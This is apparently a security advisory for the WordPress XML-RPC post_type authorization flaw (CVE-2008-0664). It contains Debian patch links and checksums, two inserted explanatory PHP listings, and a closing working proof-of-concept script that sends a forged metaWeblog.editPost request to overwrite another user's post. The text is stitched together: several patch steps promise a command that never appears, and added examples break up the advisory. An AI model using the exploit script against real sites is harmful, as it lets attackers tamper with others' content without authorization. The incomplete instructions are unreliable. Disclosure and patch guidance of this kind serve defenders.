BUGTRAQ ID: 27669
CVE(CAN) ID: CVE-2008-0664
WordPress is a free forum/blog system.
If user registration is enabled, WordPress's XML-RPC implementation (xmlrpc.php) does not check the post_type set for a page. This allows a remote attacker to submit a malicious request to the site that modifies and edits other users' posts.
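The defect described above is an authorization decision keyed on request data: the post_type member of the content struct is chosen by the caller, so it must not decide which capability check applies. The following is an added example, not WordPress code, showing the shape of a safe editPost authorization routine: the post type and author come from the stored record, the caller's post_type is ignored, and the capability names are WordPress-style primitives applied to a constructed in-memory store and role table (all of the data, the user names and the `authorize_edit`/`has_cap` helpers are assumptions made for the example).

```php
<?php
// Added example, not WordPress code: server-side authorization for an
// XML-RPC editPost call. The type used for the capability check comes
// from the stored record, never from the request's post_type member.

// Constructed stand-in for the posts table: id => stored record.
$STORE = [
    10 => ['author' => 'alice', 'post_type' => 'post'],
    11 => ['author' => 'bob',   'post_type' => 'page'],
];

// Constructed stand-in for role capabilities. The capability names follow
// WordPress's primitive capabilities; the assignments are assumptions.
$CAPS = [
    'alice' => ['edit_posts'],
    'bob'   => ['edit_posts', 'edit_pages', 'edit_others_posts', 'edit_others_pages'],
    'carol' => ['edit_posts'],   // a self-registered user
];

function has_cap(array $caps, string $user, string $cap): bool {
    return in_array($cap, $caps[$user] ?? [], true);
}

/**
 * Decide whether $user may edit record $id. $struct is the decoded content
 * struct from the XML-RPC call; it is accepted only to make the point that
 * its post_type member plays no part in the decision.
 * Returns [allowed, reason].
 */
function authorize_edit(array $store, array $caps, string $user, int $id, array $struct): array {
    if (!isset($store[$id])) {
        return [false, 'no such post'];
    }
    $record = $store[$id];

    // Deliberately ignore $struct['post_type']: it is caller-controlled.
    // Resolve the real type from storage and map it to capabilities.
    $type = $record['post_type'];
    if ($type !== 'post' && $type !== 'page') {
        return [false, "unsupported post_type '$type'"];
    }
    $own    = $type === 'page' ? 'edit_pages'        : 'edit_posts';
    $others = $type === 'page' ? 'edit_others_pages' : 'edit_others_posts';

    if (!has_cap($caps, $user, $own)) {
        return [false, "missing $own"];
    }
    if ($record['author'] !== $user && !has_cap($caps, $user, $others)) {
        return [false, "missing $others"];
    }
    return [true, 'ok'];
}

// Demonstration: a self-registered user claims post_type=page while
// targeting alice's post. The claim changes nothing about the outcome.
$claims = ['post_type' => 'page', 'title' => 'x'];
foreach ([['carol', 10], ['alice', 10], ['bob', 10], ['carol', 11], ['carol', 99]] as [$u, $id]) {
    [$ok, $why] = authorize_edit($STORE, $CAPS, $u, $id, $claims);
    printf("%-6s edit %-3d -> %s (%s)\n", $u, $id, $ok ? 'allow' : 'deny', $why);
}
```

Run with `php authz.php`; carol is denied on both 10 (missing edit_others_posts) and 11 (missing edit_pages), alice and bob are allowed on 10, and the unknown id 99 is refused before any capability is consulted. The same rule generalizes to any object type the endpoint can edit: look the object up first, then check capabilities against what was found.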
WordPress 2.3.2
Temporary workaround:
Vendor patch:
Debian has released a security advisory (DSA-1601-1) and the corresponding patches for this issue:
DSA-1601-1:New wordpress packages fix several vulnerabilities
Link: http://www.debian.org/security/2008/dsa-1601
Patch download:
Source archives:
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz
Size/MD5 checksum: 520314 e9d5373b3c6413791f864d56b473dd54
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc
Size/MD5 checksum: 891 d925a63731976b72ad35e4c1805623bf
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz
Size/MD5 checksum: 46073 486916bd4fc6463181eaba84fdc2db31
Architecture independent packages:
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb
Size/MD5 checksum: 527158 280ba949f5c38079d2209a468697fb00
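Before installing a package fetched by hand, its size and MD5 should be compared with the advisory's "Size/MD5 checksum" lines. The following is an added example, not part of the Debian advisory or of WordPress: it parses the URL/checksum pairs quoted above (copied from this page) and refuses a file that does not match. The download path is an assumption, as are the `parse_checksums` and `verify_download` helper names.

```php
<?php
// Added example, not part of the Debian advisory: verify a downloaded
// package against the "Size/MD5 checksum" lines before installing it.
// The advisory lines below are copied from the page; the download path
// is an assumption.

$advisory = <<<'TXT'
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10.orig.tar.gz
Size/MD5 checksum: 520314 e9d5373b3c6413791f864d56b473dd54
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.dsc
Size/MD5 checksum: 891 d925a63731976b72ad35e4c1805623bf
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3.diff.gz
Size/MD5 checksum: 46073 486916bd4fc6463181eaba84fdc2db31
http://security.debian.org/pool/updates/main/w/wordpress/wordpress_2.0.10-1etch3_all.deb
Size/MD5 checksum: 527158 280ba949f5c38079d2209a468697fb00
TXT;

/** Parse "URL" / "Size/MD5 checksum: SIZE MD5" line pairs into basename => [size, md5]. */
function parse_checksums(string $text): array {
    $out   = [];
    $lines = preg_split('/\R/', trim($text));
    for ($i = 0; $i + 1 < count($lines); $i += 2) {
        if (preg_match('/^Size\/MD5 checksum:\s+(\d+)\s+([0-9a-f]{32})$/', trim($lines[$i + 1]), $m)) {
            $out[basename(trim($lines[$i]))] = ['size' => (int) $m[1], 'md5' => $m[2]];
        }
    }
    return $out;
}

/** Return null when the file matches the advisory, otherwise the reason it does not. */
function verify_download(string $path, array $expected): ?string {
    $name = basename($path);
    if (!isset($expected[$name])) {
        return "no checksum recorded for $name";
    }
    if (!is_file($path)) {
        return "file not found: $path";
    }
    $size = filesize($path);
    if ($size !== $expected[$name]['size']) {
        return "size mismatch: got $size, want {$expected[$name]['size']}";
    }
    $md5 = md5_file($path);
    if (!hash_equals($expected[$name]['md5'], $md5)) {
        return "md5 mismatch: got $md5, want {$expected[$name]['md5']}";
    }
    return null;
}

$expected = parse_checksums($advisory);
$path     = '/tmp/wordpress_2.0.10-1etch3_all.deb';   // assumed download location
$problem  = verify_download($path, $expected);
echo $problem === null
    ? "OK: $path matches the advisory, install with: dpkg -i $path\n"
    : "REFUSING to install $path: $problem\n";
```

A matching size and MD5 confirms the file is the one the advisory describes and was not truncated or corrupted in transit; installing through apt against the signed security archive gives the same assurance without manual checking.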
Patch installation:
First, download the patch package with the following command:
Then, install the patch with the following command:
Installing the patch package automatically with apt-get:
First, update the local package database with the following command:
Then, install the updated package with the following command:
The vendor has released an upgrade that fixes this security issue; please download it from the vendor's homepage:
http://wordpress.org/
<?php
/**
 * POC : XMLRPC Hack
 *
 * Sends a metaWeblog.editPost call to the target's xmlrpc.php.
 * post_ID, username and password in $data are placeholders to be filled in.
 */
$host = ''; // blog hostname (no scheme), e.g. the value shown in the browser's address bar
$page = '/xmlrpc.php';
$data = '<?xml version="1.0" ?>
<methodCall>
<methodName>metaWeblog.editPost</methodName>
<params>
<value>
<i4>post_ID</i4>
</value>
<value>
<string>username</string>
</value>
<value>
<string>password</string>
</value>
<struct>
<member>
<name>post_type</name>
<value>page</value>
</member>
<member>
<name>title</name>
<value>
<string>Pwnd</string>
</value>
</member>
<member>
<name>description</name>
<value>Whoo is ma biatch</value>
</member>
</struct>
</params>
</methodCall>';

$exploited = fsockopen($host, 80, $errorNumber, $errorString);
if (!$exploited) {
    die("connect failed: $errorString ($errorNumber)\n");
}
// XML-RPC is carried in the body of an HTTP POST
$requestHeader = "POST ".$page." HTTP/1.1\r\n";
$requestHeader.= "Host: ".$host."\r\n";
$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
$requestHeader.= "Content-Type: text/xml\r\n";
$requestHeader.= "Content-Length: ".strlen($data)."\r\n";
$requestHeader.= "Connection: close\r\n\r\n";
$requestHeader.= $data;
fwrite($exploited, $requestHeader);

// print the server's reply so the outcome of the call is visible
while (!feof($exploited)) {
    echo fgets($exploited, 1024);
}
fclose($exploited);

echo 'done';
?>